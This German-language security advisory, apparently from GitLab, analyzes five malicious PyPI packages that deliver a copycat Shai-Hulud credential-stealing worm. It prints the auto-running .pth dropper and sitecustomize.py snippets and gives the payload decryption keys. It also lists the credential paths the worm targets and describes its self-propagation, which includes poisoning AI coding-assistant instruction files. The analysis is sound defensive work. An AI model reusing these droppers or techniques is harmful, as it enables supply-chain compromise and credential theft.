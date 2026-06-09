Das Vulnerability Research-Team von GitLab hat einen koordinierten Supply-Chain-Angriff auf PyPI identifiziert, der eine Kopie der Shai-Hulud-Malware einsetzt. Wir haben fünf schädliche Pakete gefunden: vier Typosquats, die Flask, Requests und NumPy imitieren, und ein weaponized legitimes Projekt. Die Pakete führen Code beim Installieren aus, ohne einen Import oder Funktionsaufruf zu erfordern, und tragen einen selbstverbreitenden Credential Stealer, der CI/CD-Umgebungen aller großen Cloud-Anbieter ins Visier nimmt.

Wir haben bestätigt, dass GitLab keines der betroffenen Pakete verwendet, und teilen unsere Erkenntnisse, um der breiteren Security-Community eine effektive Reaktion zu ermöglichen.

Angriffsverlauf

Unsere Monitoring-Systeme haben am 7. Juni 2026 fünf schädliche PyPI-Pakete eines einzelnen Accounts ( elitexp ) markiert. Vier sind Typosquats:

rlask und tlask , Typosquats von Flask

und , Typosquats von Flask rsquests , ein Typosquat von Requests

, ein Typosquat von Requests nhmpy , ein Typosquat von NumPy

Das fünfte, mflux-streamlit , ist ein legitimes Projekt mit echten Nutzern, das der Angreifer durch das Veröffentlichen bösartiger Versionen 0.0.3 und 0.0.4 nach der Typosquat-Welle weaponized hat.

Der Angreifer veröffentlichte zunächst saubere „Probe"-Versionen mit Versionsnummern, die exakt den aktuellen Real-Releases entsprachen (Flask 3.1.3, Requests 2.34.2 und NumPy 2.4.6). Sobald diese ohne Probleme indiziert waren, schob er neue Versionen mit eingebettetem Wurm-Payload nach.

Dies ist ein Copycat-Deployment. TeamPCP, die Gruppe hinter Shai-Hulud, hat den Wurm-Code am 12. Mai 2026 als Open Source veröffentlicht. Seitdem verfolgen wir unabhängige Akteure, die das Toolkit aufgreifen und auf neue Ziele richten. Diese Kampagne bringt denselben Wurm in das Python-Ökosystem.

Technische Analyse

Erster Infektionsvektor

Die ursprüngliche npm-Variante nutzte ein preinstall -Skript. Diese Kampagne verfolgt einen anderen Ansatz und nutzt Pythons .pth -Datei-Mechanismus. Wheel- Pakete können .pth -Dateien mitliefern, die Python beim Start automatisch verarbeitet – ohne expliziten Import. Jedes schädliche Paket enthält eine Datei wie rlask-setup.pth mit einem einzeiligen Dropper:

Copy import os as _O,tempfile as _T;_G=_O.path.join(_T.gettempdir(), ".bun_ran" ); _O.path.exists(_G) or exec ( 'import os as _o,subprocess as _s,urllib.request as _u...' )

Der Dropper prüft auf eine Marker-Datei ( .bun_ran im System-Temp-Verzeichnis), um eine erneute Ausführung zu vermeiden, lädt dann die Bun-JavaScript-Runtime von GitHub herunter und führt damit einen 5 MB großen verschleierten JavaScript-Payload aus, der im Paket gebündelt ist.

Frühe Versionen von rlask enthielten außerdem eine sitecustomize.py -Datei als Backup-Ausführungspfad. Python importiert sitecustomize beim Start automatisch, und diese Datei durchsuchte sys.path nach dem versteckten _index.js -Payload:

Copy import subprocess, os, sys for d in sys.path: js = os.path.join(d, "_index.js" ) if os.path.exists(js): subprocess.run([ "node" , js]) break

Der Angreifer hat diesen Backup-Mechanismus in späteren Versionen entfernt und den .pth -Ansatz offenbar für ausreichend befunden.

Der JavaScript-Payload ist in drei Schichten gewickelt:

Eine ROT-N-Zeichenchiffre, angewendet auf ein Integer-Array (der Rotationswert variiert je Paket: ROT-13 für [email protected] , ROT-17 für rsquests , ROT-25 für tlask ) AES-128-GCM-Verschlüsselung mit hardcodierten Keys, die zwei verschlüsselte Blobs erzeugt Standard Variable-Name-Mangling ( _0x -Präfix-Obfuskierung) auf dem inneren Payload

Wir haben den Payload durch statische Analyse entschlüsselt, ohne Code auszuführen. Der erste Blob (907 Bytes) ist der Bun-Runtime-Downloader. Der zweite Blob (772 KB) ist der vollständige Shai-Hulud-Credential-Stealer mit 2.538 hardcodierten Strings.

Für Forscher, die eine eigene Analyse durchführen, hier die AES-Entschlüsselungskeys:

Layer Key IV Bun downloader c95506221d18936328fbc7ddcd21e3dd 48da5faeafac0ac88a410bb0 Worm payload 7557c4e782a0622159476d1ea10d5236 55a7d25e0e61b77cc175bcc3

Credential Harvesting

Einmal aktiv, greift der Wurm Credentials auf allen großen Cloud- und CI/CD-Plattformen ab:

GitHub Actions : GITHUB_TOKEN , Personal Access Tokens, Fine-Grained Tokens, OIDC-Tokens, Organisations- und Repository-Secrets, Actions-Artifacts und Runner-Prozessspeicher

: , Personal Access Tokens, Fine-Grained Tokens, OIDC-Tokens, Organisations- und Repository-Secrets, Actions-Artifacts und Runner-Prozessspeicher AWS : IAM-Access-Keys, Secret Keys, Session-Tokens, IMDS-Instanz-Credentials ( 169[.]254[.]169[.]254 ), Secrets-Manager-Einträge, SSM-Parameter, STS-Federation-Tokens

: IAM-Access-Keys, Secret Keys, Session-Tokens, IMDS-Instanz-Credentials ( ), Secrets-Manager-Einträge, SSM-Parameter, STS-Federation-Tokens Azure : Client Secrets, Managed Identity Tokens, Key Vault Secrets, Federated Credentials, Microsoft Graph API Tokens

: Client Secrets, Managed Identity Tokens, Key Vault Secrets, Federated Credentials, Microsoft Graph API Tokens GCP : Service-Account-Keys, Application Default Credentials, Cloud-Platform-Scope-Tokens

: Service-Account-Keys, Application Default Credentials, Cloud-Platform-Scope-Tokens HashiCorp Vault : Vault-Tokens aus sieben bekannten Dateisystempfaden ( /var/run/secrets/vault-token , /etc/vault/token , /root/.vault-token und weitere), plus API-Zugriff und Kubernetes Vault Auth

: Vault-Tokens aus sieben bekannten Dateisystempfaden ( , , und weitere), plus API-Zugriff und Kubernetes Vault Auth npm / JFrog : npm-Tokens, JFrog/Artifactory-API-Keys, OIDC-Token-Exchange

: npm-Tokens, JFrog/Artifactory-API-Keys, OIDC-Token-Exchange PyPI : Publishing-Tokens, OIDC-Mint-Tokens

: Publishing-Tokens, OIDC-Mint-Tokens RubyGems : API-Keys, Gem-Publishing-Credentials

: API-Keys, Gem-Publishing-Credentials SSH : Private Keys für Lateral Movement

: Private Keys für Lateral Movement Kubernetes : Service-Account-Tokens, Kubeconfig-Dateien

: Service-Account-Tokens, Kubeconfig-Dateien Sigstore : OIDC-Tokens und Fulcio-Signing-Zertifikate, die dem Angreifer ermöglichen würden, Artefakte unter einer vertrauenswürdigen Identität zu signieren

: OIDC-Tokens und Fulcio-Signing-Zertifikate, die dem Angreifer ermöglichen würden, Artefakte unter einer vertrauenswürdigen Identität zu signieren Datenbanken: MongoDB-, MySQL-, PostgreSQL- und Redis-Connection-Strings mit eingebetteten Passwörtern

Selbstverbreitung

Wie die ursprüngliche npm-Variante ist dies nicht nur ein Stealer. Er verbreitet sich. Mit gestohlenen Credentials führt der Wurm Folgendes aus:

Committet .github/setup.js und Workflow-Dateien in zugängliche GitHub-Repositories und bewirkt damit, dass der Wurm in anderen CI-Pipelines erneut ausgeführt wird

und Workflow-Dateien in zugängliche GitHub-Repositories und bewirkt damit, dass der Wurm in anderen CI-Pipelines erneut ausgeführt wird Injiziert .github/copilot-instructions.md , um KI-Code-Assistenten zu vergiften

, um KI-Code-Assistenten zu vergiften Veröffentlicht zusätzliche vergiftete Pakete auf PyPI, npm und RubyGems mit gestohlenen Registry-Tokens

Versucht Privilege Escalation auf selbst gehosteten CI-Runnern durch Injektion von Sudoers-Regeln

Prüft auf StepSecuritys harden-runner und passt das Verhalten bei Erkennung an

Der Angreifer

Alle fünf Pakete gehören dem PyPI-Account elitexp . Der Account wurde im November 2024 mit einem legitimen Paket erstellt ( mflux-streamlit , eine Streamlit-UI für Bildgenerierung mit 11 Stars auf GitHub). Der zugehörige GitHub-Account ( github[.]com/elitexp ) ist über 13 Jahre alt und hat 43 öffentliche Repositories, darunter Uni-Coursework und Laravel-Projekte.

Upload-Metadaten zeigen, dass alle Pakete mit Bun/1.3.14 als User-Agent veröffentlicht wurden – derselben Runtime, die die Malware als Teil ihrer Ausführungskette herunterlädt.

Der Angreifer hat auch mflux-streamlit selbst weaponized. Versionen 0.0.1 und 0.0.2 sind sauber, aber Versionen 0.0.3 und 0.0.4, veröffentlicht um 15:23 und 15:37 UTC nach der Typosquat-Kampagne, enthalten denselben .pth -Dropper und obfuskierten Payload. Das macht den Angriff gefährlicher als ein typischer Typosquat: mflux-streamlit ist ein echtes Projekt mit bestehenden Nutzern, die das vergiftete Update durch normale Abhängigkeitsauflösung erhalten könnten.

Indicators of Compromise

Type Indicator Description package rlask 3.1.4-3.1.7 Malicious Flask typosquat package tlask 3.1.4 Malicious Flask typosquat package rsquests 2.34.3 Malicious Requests typosquat package nhmpy 2.4.7 Malicious NumPy typosquat package mflux-streamlit 0.0.3, 0.0.4 Weaponized legitimate package file {package}-setup.pth Auto-executing dropper (SHA256: 6506d317... ) file sitecustomize.py Backup auto-execution (present in rlask only) file {package}/_index.js Obfuscated worm payload (5.2MB) file .bun_ran Execution marker in system temp directory network hxxps[://]github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/bun-{os}-{arch}.zip Bun runtime download network hxxps[://]upload[.]pypi[.]org/legacy/ Worm publishes poisoned PyPI packages network hxxp[://]169[.]254[.]169[.]254/latest/meta-data/iam/security-credentials/ AWS IMDS credential theft network hxxps[://]login[.]microsoftonline[.]com/ Azure AD token acquisition network hxxps[://]fulcio[.]sigstore[.]dev Sigstore certificate request actor elitexp (PyPI) Package owner actor Bun/1.3.14 Upload user-agent

Maßnahmen im Kompromittierungsfall

Falls eines dieser Pakete in der eigenen Umgebung installiert war:

Das Paket sofort entfernen und im System-Temp-Verzeichnis nach der Marker-Datei .bun_ran suchen. Alle Credentials rotieren, die in der Umgebung zugänglich waren, in der das Paket installiert wurde. Dazu gehören CI/CD-Tokens, Cloud-Provider-Credentials, SSH-Keys und Registry-Publishing-Tokens. GitHub-Repositories auf unerwartete Commits prüfen, insbesondere auf Dateien wie .github/setup.js , .github/copilot-instructions.md oder geänderte Workflow-Dateien. Package-Registry-Accounts (PyPI, npm, RubyGems) auf nicht selbst veröffentlichte Pakete prüfen. CI/CD-Pipeline-Logs auf unerwartete Bun-Downloads oder JavaScript-Ausführungen überprüfen.

Timeline

Date Event 2026-05-12 TeamPCP veröffentlicht den Shai-Hulud-Wurm als Open Source 2026-06-07 13:47 UTC Probe-Versionen veröffentlicht ( [email protected] , [email protected] ) 2026-06-07 14:20 UTC Erste bösartige Version ( [email protected] ), innerhalb von 28 Sekunden erkannt 2026-06-07 14:24 UTC Automatische Analyse abgeschlossen, als bösartig/kritisch markiert 2026-06-07 14:27-15:04 UTC Sechs weitere bösartige Versionen über alle vier Paketnamen veröffentlicht 2026-06-07 15:23-15:37 UTC Angreifer weaponized eigenes legitimes mflux-streamlit -Paket (v0.0.3, v0.0.4) 2026-06-07 Untersuchung bestätigt vollständigen Shai-Hulud-Wurm durch statische Analyse 2026-06-07 16:01 UTC Alle bösartigen Pakete dem PyPI-Security-Team gemeldet 2026-06-08 03:15:06 UTC Advisory zur GitLab Advisory Database hinzugefügt 2026-06-08 PyPI entfernt alle Releases der bösartigen Pakete

GitLab als Erkennungshilfe

Wer GitLab Ultimate einsetzt, kann mit Dependency Scanning automatisch die Exposition gegenüber diesen Paketen in Projekten aufdecken. Wir haben Advisories (GMS-2026-572 bis GMS-2026-576) für alle fünf Pakete in der GitLab Advisory Database eingereicht. Nach dem Merge wird jedes Projekt mit aktiviertem Dependency Scanning diese Pakete in Pipeline-Ergebnissen und dem Vulnerability Report markieren.

Für Teams, die viele Repositories verwalten, kann GitLab Duo Chat mit dem Security Analyst Agent die schnelle Triage unterstützen. Mögliche Fragen:

"Are any of my dependencies affected by the Shai-Hulud PyPI campaign?"

"Does this project have any malicious Python dependencies?"

Ausblick

Diese Kampagne haben wir nach der Open-Source-Veröffentlichung des Shai-Hulud-Wurms durch TeamPCP im Mai erwartet. Unabhängige Akteure greifen das Toolkit auf und setzen es gegen neue Ökosysteme ein. Die Python-Variante verwendet einen anderen ersten Infektionsvektor ( .pth -Dateien statt preinstall -Skripte), trägt aber denselben Credential-Harvesting- und Selbstverbreitungs-Code darunter.

Unsere Monitoring-Systeme verfolgen weiterhin Copycat-Deployments über npm, PyPI und andere Registries. Wir werden diesen Beitrag aktualisieren, sobald weitere Informationen vorliegen.